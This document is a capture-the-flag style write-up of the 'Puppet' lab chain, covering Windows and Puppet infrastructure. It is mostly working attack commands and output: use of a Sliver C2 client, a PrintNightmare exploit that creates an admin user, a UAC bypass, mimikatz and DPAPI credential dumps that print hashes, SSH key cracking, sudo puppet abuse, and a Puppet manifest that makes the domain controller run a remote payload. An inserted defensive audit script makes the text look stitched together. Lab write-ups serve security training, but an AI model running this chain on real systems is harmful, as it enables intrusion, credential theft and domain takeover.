Puppet (Chain)

Machine information

Information Gathering

Nmap scan report for 10.10.235.133
PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Nmap scan report for 10.10.235.134
PORT     STATE SERVICE       REASON          VERSION
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Nmap scan report for 10.10.235.135
PORT     STATE SERVICE       REASON          VERSION
21/tcp    open  ftp            syn-ack ttl 63 vsftpd 3.0.5
22/tcp    open  ssh            syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
8443/tcp  open  ssl/https-alt? syn-ack ttl 63
31337/tcp open  ssl/Elite?     syn-ack ttl 63

Services Enumeration

FTP

Anonymous FTP login allowed

21/tcp    open  ftp            syn-ack ttl 63 vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw----r--    1 0        0            2119 Oct 11  2024 red_127.0.0.1.cfg
|_-rwxr-xr-x    1 0        0        36515304 Oct 12  2024 sliver-client_linux

Compromising FILE01

Initial Access on FILE01

Setting up a tunnel to connect to the Sliver server

During the assessment, the tester found a Sliver client configuration file, along with a Sliver client binary, on the FTP server that allowed anonymous authentication; both had been left there ready for use.

The tester had to set up a tunnel redirecting local traffic on 31337/TCP to 10.10.242.167:31337/TCP so that the Sliver client (whose config points at 127.0.0.1:31337) could be used.

❯ sudo ./socatx64.bin TCP-LISTEN:31337,reuseaddr,fork TCP:10.10.242.167:31337

Connecting to the Sliver server

❯ ./sliver-client_linux import red_127.0.0.1.cfg
2025/05/08 23:03:42 Saved new client config to: /home/Intrusionz3r0/.sliver-client/configs/red_127.0.0.1.cfg

❯ ./sliver-client_linux
? Select a server: red@127.0.0.1 (ba37d8712444d4b2)
Connecting to 127.0.0.1:31337 ...
[*] Loaded 22 aliases from disk
[*] Loaded 158 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain reinforce
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

sliver > beacons 

 ID         Name          Tasks   Transport   Remote Address        Hostname   Username             Operating System   Locale   Last Check-In                            Next Check-In                         
========== ============= ======= =========== ===================== ========== ==================== ================== ======== ======================================== =======================================
 d5300ded   puppet-mtls   0/0     mtls        10.10.235.134:52369   File01     PUPPET\Bruce.Smith   windows/amd64      en-US    Thu May  8 23:03:29 EDT 2025 (19s ago)   Thu May  8 23:03:59 EDT 2025 (in 11s) 

Running the BloodHound ingestor to enumerate the domain

Nothing of interest was found in the collected data.

sliver (puppet-mtls) > sharp-hound-4 -t 300 -s -- -c all

[*] sharp-hound-4 output:
2025-05-08T20:26:03.7454873-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-05-08T20:26:04.0287139-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-05-08T20:26:04.0605463-07:00|INFORMATION|Initializing SharpHound at 8:26 PM on 5/8/2025
2025-05-08T20:26:04.3114077-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for puppet.vl : DC01.puppet.vl
2025-05-08T20:26:04.4680598-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-05-08T20:26:04.7187772-07:00|INFORMATION|Beginning LDAP search for puppet.vl
2025-05-08T20:26:04.7187772-07:00|INFORMATION|Testing ldap connection to puppet.vl
2025-05-08T20:26:04.7821325-07:00|INFORMATION|Beginning LDAP search for puppet.vl Configuration NC
2025-05-08T20:26:35.2100270-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 39 MB RAM
2025-05-08T20:26:54.7771727-07:00|INFORMATION|Producer has finished, closing LDAP channel
2025-05-08T20:26:54.7928132-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-05-08T20:26:55.0747879-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.PUPPET.VL: SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel:CertificateMappingMethods
2025-05-08T20:26:55.7469843-07:00|INFORMATION|Consumers finished, closing output channel
2025-05-08T20:26:55.7629329-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-05-08T20:26:56.0920325-07:00|INFORMATION|Status: 329 objects finished (+329 6.45098)/s -- Using 50 MB RAM
2025-05-08T20:26:56.0920325-07:00|INFORMATION|Enumeration finished in 00:00:51.3860345
2025-05-08T20:26:56.2173633-07:00|INFORMATION|Saving cache with stats: 270 ID to type mappings.
 272 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2025-05-08T20:26:56.2647300-07:00|INFORMATION|SharpHound Enumeration Completed at 8:26 PM on 5/8/2025! Happy Graphing!
[*] Output saved to /tmp/sharp-hound-1_File012735697831.log

Privilege escalation on FILE01

Discovering a PrintNightmare vulnerability

The tester identified that FILE01 was vulnerable to PrintNightmare, which allows a standard user to escalate privileges by creating a local administrator account.

# echo 'Get-Service -Name Spooler' | base64 -w0 | xclip -sel clip
sliver (puppet-mtls) > sharpsh -- '-e -c R2V0LVNlcnZpY2UgLU5hbWUgU3Bvb2xlcgo='

[*] sharpsh output:

Status   Name               DisplayName                           
------   ----               -----------                           
Running  Spooler            Print Spooler

# echo 'Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" | Select-Object NoWarningNoElevationOnInstall, UpdatePromptSettings' | base64 -w0|xclip -sel clip
sliver (puppet-mtls) > sharpsh -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtMTTpcU29mdHdhcmVcUG9saWNpZXNcTWljcm9zb2Z0XFdpbmRvd3MgTlRcUHJpbnRlcnNcUG9pbnRBbmRQcmludCIgfCBTZWxlY3QtT2JqZWN0IE5vV2FybmluZ05vRWxldmF0aW9uT25JbnN0YWxsLCBVcGRhdGVQcm9tcHRTZXR0aW5ncwo='

[*] sharpsh output:

NoWarningNoElevationOnInstall UpdatePromptSettings
----------------------------- --------------------
                            1                    1
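The Spooler state and the two Point and Print policy values queried above are the usual PrintNightmare exposure indicators. The following PowerShell audit function is an added example, not part of the original writeup or of any tool used in it: it reads the same values, plus the RestrictDriverInstallationToAdministrators value introduced by KB5005652, and returns a finding object that a defender can collect from many hosts. The function name and the field names of the returned object are choices made for this example.

```powershell
# Added example (not from the original writeup): audit a host for the
# PrintNightmare exposure indicators the tester checked on FILE01.
function Test-PointAndPrintExposure {
    [CmdletBinding()]
    param()

    # Policy key the writeup queried through sharpsh; an absent key means no policy is set.
    $key     = 'HKLM:\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $props   = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue

    $noWarn   = if ($props) { $props.NoWarningNoElevationOnInstall } else { $null }
    $update   = if ($props) { $props.UpdatePromptSettings } else { $null }
    # Value introduced by KB5005652; when it is absent, patched hosts default to
    # requiring administrator rights for printer driver installation.
    $restrict = if ($props) { $props.RestrictDriverInstallationToAdministrators } else { $null }
    $spoolerRunning = ($null -ne $spooler -and $spooler.Status -eq 'Running')

    $findings = @()
    if ($spoolerRunning) {
        $findings += 'Print Spooler service is running'
    }
    if ($noWarn -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall=1: no warning or elevation prompt on driver install'
    }
    if ($update -eq 1) {
        $findings += 'UpdatePromptSettings=1: no prompt on driver update'
    }
    if ($restrict -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators=0: non-admins may install printer drivers'
    }

    # Treat the host as exposed only when the Spooler is running and the policy
    # relaxes driver installation, which is the combination seen on FILE01.
    $exposed = $spoolerRunning -and (($noWarn -eq 1 -and $update -eq 1) -or ($restrict -eq 0))

    [PSCustomObject]@{
        ComputerName                               = $env:COMPUTERNAME
        SpoolerRunning                             = $spoolerRunning
        NoWarningNoElevationOnInstall              = $noWarn
        UpdatePromptSettings                       = $update
        RestrictDriverInstallationToAdministrators = $restrict
        Exposed                                    = $exposed
        Findings                                   = $findings
    }
}

# Usage: report the findings for the local host.
Test-PointAndPrintExposure | Format-List
```

The hardened state this check expects is both Point and Print values at 0 (or absent), RestrictDriverInstallationToAdministrators at 1, and the Spooler service disabled on hosts such as domain controllers and file servers that do not need to print.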

Abusing PrintNightmare to add a user to the local Administrators group

Script: CVE-2021-1675

sliver (puppet-mtls) > upload /home/Intrusionz3r0/Documents/Tools/CVE-2021-34527.ps1

[*] Wrote file to C:\temp\CVE-2021-34527.ps1

# echo 'Invoke-Nightmare -DriverName "Xerox" -NewUser "Intrusionz3r0" -NewPassword "Password123!"' | base64 -w0 | xclip -sel clip
sliver (puppet-mtls) > sharpsh -t 100 -- '-u c:\temp\CVE-2021-34527.ps1 -e -c SW52b2tlLU5pZ2h0bWFyZSAtRHJpdmVyTmFtZSAiWGVyb3giIC1OZXdVc2VyICJJbnRydXNpb256M3IwIiAtTmV3UGFzc3dvcmQgIlBhc3N3b3JkMTIzISIK'

Verifying that the user belongs to the local Administrators group

sliver (puppet-mtls) > sa-netuser Intrusionz3r0

[*] Successfully executed sa-netuser (coff-loader)
[*] Got output:
User name:			Intrusionz3r0
Full Name:			Intrusionz3r0
<SNIP>
Local Group Memberships:
	Administrators

sliver (puppet-mtls) > runas --username 'Intrusionz3r0' --password 'Password123!' -p 'C:\ProgramData\Puppet\puppet-update.exe'

[*] Beacon 0f1ae072 puppet-mtls - 10.10.235.134:53415 (File01) - windows/amd64 - Thu, 08 May 2025 23:57:28 EDT

Performing UAC Bypass

During post-exploitation, the tester obtained a medium-integrity shell, then executed UAC-BOF-Bonanza to obtain a high-integrity shell.

Repository: UAC-BOF-Bonanza

sliver (puppet-mtls) > interactive 

[*] Using beacon's active C2 endpoint: mtls://pm01.puppet.vl:8443
[*] Tasked beacon puppet-mtls (4614102f)

[*] Session 71ced6b4 puppet-mtls - 10.10.235.134:53476 (File01) - windows/amd64 - Fri, 09 May 2025 00:00:10 EDT
sliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe'

[*] Successfully executed SspiUacBypass (coff-loader)
[*] Got output:

	SspiUacBypass - Bypassing UAC with SSPI Datagram Contexts
	by @splinter_code

Forging a token from a fake Network Authentication through Datagram Contexts
Network Authentication token forged correctly, handle --> 0x29c
Forged Token Session ID set to 1. lsasrv!LsapApplyLoopbackSessionId adjusted the token to our current session 
Bypass Success! Now impersonating the forged token... Loopback network auth should be seen as elevated now
Invoking CreateSvcRpc (by @x86matthew)
Connecting to \\127.0.0.1\pipe\ntsvcs RPC pipe 
Opening service manager...
Creating temporary service...
Executing 'C:\ProgramData\Puppet\puppet-update.exe' as SYSTEM user...
Deleting temporary service...
Finished

[*] Beacon 606f616d puppet-mtls - 10.10.235.134:53512 (File01) - windows/amd64 - Fri, 09 May 2025 00:01:43 EDT

Dumping logon credentials

sliver (puppet-mtls) > sideload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe "privilege::debug sekurlsa::logonpasswords exit"

Authentication Id : 0 ; 11997146 (00000000:00b70fda)
Session           : Interactive from 0
User Name         : Intrusionz3r0
Domain            : FILE01
Logon Server      : FILE01
Logon Time        : 5/8/2025 8:55:43 PM
SID               : S-1-5-21-2946821189-2073930159-359736154-1000
	msv :	
	[00000003] Primary
	* Username : Intrusionz3r0
	* Domain   : FILE01
	* NTLM     : 2b576acbe6bcfda7294d6bd18041b8fe
	* SHA1     : e30d1c18c56c027667d35734660751dc80203354
	* DPAPI    : e30d1c18c56c027667d35734660751dc
	
Authentication Id : 0 ; 609646 (00000000:00094d6e)
Session           : Service from 0
User Name         : svc_puppet_win_t1
Domain            : PUPPET
Logon Server      : DC01
Logon Time        : 5/8/2025 8:01:31 PM
SID               : S-1-5-21-3066630505-2324057459-3046381011-1131
	msv :	
	[00000003] Primary
	* Username : svc_puppet_win_t1
	* Domain   : PUPPET
	* NTLM     : 784c7b51056579e64f74c71cb013dda6
	* SHA1     : e4b6c57180670c42d1894db1daebe833787ad23b
	* DPAPI    : abe71d756f0b2d9e69b803833ef4869d

Compromising Puppet Server

Initial Access on Puppet Server

Lateral movement to svc_puppet_win_t1

The tester proceeded to migrate into a process running as svc_puppet_win_t1.

sliver (puppet-mtls) > migrate -p 1192

[*] Successfully migrated to 1192

[*] Beacon 1cf59777 puppet-mtls - 10.10.235.134:53619 (File01) - windows/amd64 - Fri, 09 May 2025 00:06:46 EDT

sliver (puppet-mtls) > use 1cf59777

[*] Active beacon puppet-mtls (1cf59777-9d07-4b46-9f67-2f37aca5ea6a)

sliver (puppet-mtls) > interactive 

[*] Using beacon's active C2 endpoint: mtls://pm01.puppet.vl:8443
[*] Tasked beacon puppet-mtls (00ab7c39)

[*] Session ad432b0d puppet-mtls - 10.10.235.134:53649 (File01) - windows/amd64 - Fri, 09 May 2025 00:07:49 EDT

sliver (puppet-mtls) > use ad432b0d-c7c3-4114-ba61-d8e5e8d4ed93

[*] Active session puppet-mtls (ad432b0d-c7c3-4114-ba61-d8e5e8d4ed93)

sliver (puppet-mtls) > whoami

Logon ID: PUPPET\svc_puppet_win_t1
[*] Current Token ID: PUPPET\svc_puppet_win_t1
sliver (puppet-mtls) >  

Discovering an SSH key pair

sliver (puppet-mtls) > sa-netshares DC01

[*] Successfully executed sa-netshares (coff-loader)
[*] Got output:
Share: 
---------------------DC01----------------------------------
ADMIN$
C$
IPC$
it
NETLOGON
SYSVOL

sliver (puppet-mtls) > ls '\\DC01.puppet.vl\it'

\\DC01.puppet.vl\it\ (3 items, 813.9 KiB)
=========================================
drwxrwxrwx  .ssh          <dir>      Sat Oct 12 01:39:50 -0700 2024
drwxrwxrwx  firewalls     <dir>      Sat Oct 12 01:15:05 -0700 2024
-rw-rw-rw-  PsExec64.exe  813.9 KiB  Sat Oct 12 01:07:00 -0700 2024

sliver (puppet-mtls) > ls '\\DC01.puppet.vl\it\.ssh'

\\DC01.puppet.vl\it\.ssh (2 items, 580 B)
=========================================
-rw-rw-rw-  ed25519      472 B  Sat Oct 12 01:14:23 -0700 2024
-rw-rw-rw-  ed25519.pub  108 B  Sat Oct 12 01:40:09 -0700 2024

sliver (puppet-mtls) > download  '\\DC01.puppet.vl\it\.ssh\ed25519'

[*] Wrote 472 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Vulnlabs/Puppet/Content/\\DC01.puppet.vl\it\.ssh\ed25519

Cracking the SSH private key to obtain its passphrase

❯ ssh2john ed25519
ed25519:$sshng$6$16$b15359c23be771859026d46fe38e9f2e$290$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$16$130
❯ john ssh_hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
puppet           (ed25519)

Setting up a port forward to the tester machine

sliver (puppet-mtls) > sa-probe 10.10.235.135 22

[*] Successfully executed sa-probe (coff-loader)
[*] Got output:
10.10.235.135:22 OPEN

sliver (puppet-mtls) > portfwd add -b 10.8.5.48:2222 -r 10.10.235.135:22

[*] Port forwarding 10.8.5.48:2222 -> 10.10.235.135:22

Converting the key file to Unix line endings

❯ dos2unix ed25519
dos2unix: converting file ed25519 to Unix format...
❯ ssh -i ed25519 -t 'svc_puppet_lin_t1@puppet.vl'@10.10.254.215

Connecting to the Puppet instance

Puppet is a configuration management tool that centralizes and automates the configuration of managed systems. Its open-source edition covers server configuration, management, deployment, and orchestration.

GTFOBins: https://gtfobins.github.io/gtfobins/puppet/

❯ ssh -i ed25519 'svc_puppet_lin_t1@puppet.vl'@10.8.5.48 -p 2222
Enter passphrase for key 'ed25519': 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-122-generic x86_64)
<SNIP>
Last login: Sat Oct 12 18:18:52 2024 from 10.8.0.101      

Privilege escalation on Puppet Server

Discovering a privilege escalation via sudoers

svc_puppet_lin_t1@puppet.vl@puppet:~$ sudo -l
Matching Defaults entries for svc_puppet_lin_t1@puppet.vl on puppet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc_puppet_lin_t1@puppet.vl may run the following commands on puppet:
    (ALL) NOPASSWD: /usr/bin/puppet      
svc_puppet_lin_t1@puppet.vl@puppet:~$  LFILE="/root/.ssh/authorized_keys"
svc_puppet_lin_t1@puppet.vl@puppet:~$  sudo /usr/bin/puppet apply -e "file { '$LFILE': content => 'MYKEY' }"

Compromising Domain Controller DC01

Listing nodes on the Puppet instance

According to ChatGPT, it is possible to execute commands on the managed nodes.

Page: https://lofic.github.io/tips/puppet-list_nodes.html

root@puppet:$ puppet cert list --all
Warning: `puppet cert` is deprecated and will be removed in a future release.
   (location: /usr/lib/ruby/vendor_ruby/puppet/application.rb:370:in `run')
+ "dc01.puppet.vl"   (SHA256) E4:C3:42:71:83:88:08:07:6A:C5:A1:9D:FA:C2:7E:BB:D5:65:5F:71:9F:D3:BE:11:96:B7:26:CD:4F:5C:68:C6
+ "file01.puppet.vl" (SHA256) 61:ED:86:C3:55:35:36:89:D5:FC:3A:32:05:D1:23:EC:C3:F1:58:E4:D7:9A:6B:3E:65:F4:F2:F2:77:34:B0:CA
+ "pm01"             (SHA256) 94:8C:76:E9:D1:43:CA:FF:6C:06:34:80:23:02:8C:49:20:00:B2:43:62:42:16:7B:AF:4F:A6:68:F3:C2:D8:06 (alt names: "DNS:pm01", "DNS:puppet")
+ "pm01.localdomain" (SHA256) 2D:DC:44:F8:49:B6:41:B3:9A:2A:AE:B3:D2:9F:C7:6F:1F:0A:62:00:19:EB:B8:93:D6:C6:65:28:60:D9:F1:B8 (alt names: "DNS:pm01.localdomain", "DNS:puppet")
+ "puppet.puppet.vl" (SHA256) 11:65:85:DB:9F:E4:19:03:04:21:92:4B:19:03:17:6D:29:A9:E9:56:0F:04:A6:16:2B:44:46:A3:33:20:92:9C (alt names: "DNS:puppet", "DNS:puppet.puppet.vl")
root@puppet:~$ mkdir /etc/puppet/code/environments/production/manifests
root@puppet:~$ nano /etc/puppet/code/environments/production/manifests/site.pp

node 'dc01.puppet.vl' {
  exec { 'reverse_shell':
    command => 'C:\\Windows\\System32\\cmd.exe /c \\\\FILE01.puppet.vl\\files\\puppet-update.exe',
    path    => ['C:\\Windows\\System32', 'C:\\Windows'],
  }
}

node default {
  notify { 'this node did not match any of the listed definitions': }
}

# Check the manifest syntax
root@puppet:$ puppet parser validate /etc/puppet/code/environments/production/manifests/site.pp
# Apply the changes
root@puppet:$ puppet apply /etc/puppet/code/environments/production/manifests/site.pp

Privilege escalation on DC01

[*] Beacon 287715d3 puppet-mtls - 10.10.235.133:62076 (DC01) - windows/amd64 - Fri, 09 May 2025 01:57:21 EDT

sliver (puppet-mtls) > use 287715d3
sliver (puppet-mtls) > interactive 

[*] Session 7e109fa8 puppet-mtls - 10.10.235.133:62112 (DC01) - windows/amd64 - Fri, 09 May 2025 01:58:56 EDT

sliver (puppet-mtls) > use 7e109fa8
sliver (puppet-mtls) > getsystem
sliver (puppet-mtls) > sharpdpapi machinecredentials

[*] sharpdpapi output:

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.12.0                               


[*] Action: Machine DPAPI Credential Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: F55461801C15D867EA56A3BF183977FA6301E601CD30040C9B9008515A1855D614A6831EF1986886
[*]    m/u : F55461801C15D867EA56A3BF183977FA6301E601 / CD30040C9B9008515A1855D614A6831EF1986886


[*] SYSTEM master key cache:

{16ce0746-d7db-4885-9b77-d1418640bfce}:0779112B7A1588F460A7A55723A2D508169C447F
{1762fb49-daaa-41a5-b777-67d3ceae8f8d}:0C4B09075E42E044C01E8FF01A704F8C9802C989
{f75e6a65-79d0-4f1b-ad4c-a2b1cd91dce2}:F92A43B1F2DC16CFC12966AA7F56935370524061
{6cdf826d-e866-4710-ab78-a891d59e20ef}:DFA4DE570ABE63125B03088A6C5C91B77C74DA42
{e2de4c34-3c46-411f-91cb-ab2c9cd2f205}:8819EE03468A4B376AE0FD5EBAEE4471F7AACE80


[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 39FAB9BA3A19E88594B1D50B5E44AAA4

    guidMasterKey    : {e2de4c34-3c46-411f-91cb-ab2c9cd2f205}
    size             : 592
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 10/12/2024 1:44:00 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{ACFD7F3B-51A4-4B11-8428-F287E956EC4C}
    TargetAlias      : 
    Comment          : 
    UserName         : PUPPET\root
    Credential       : <SNIP>
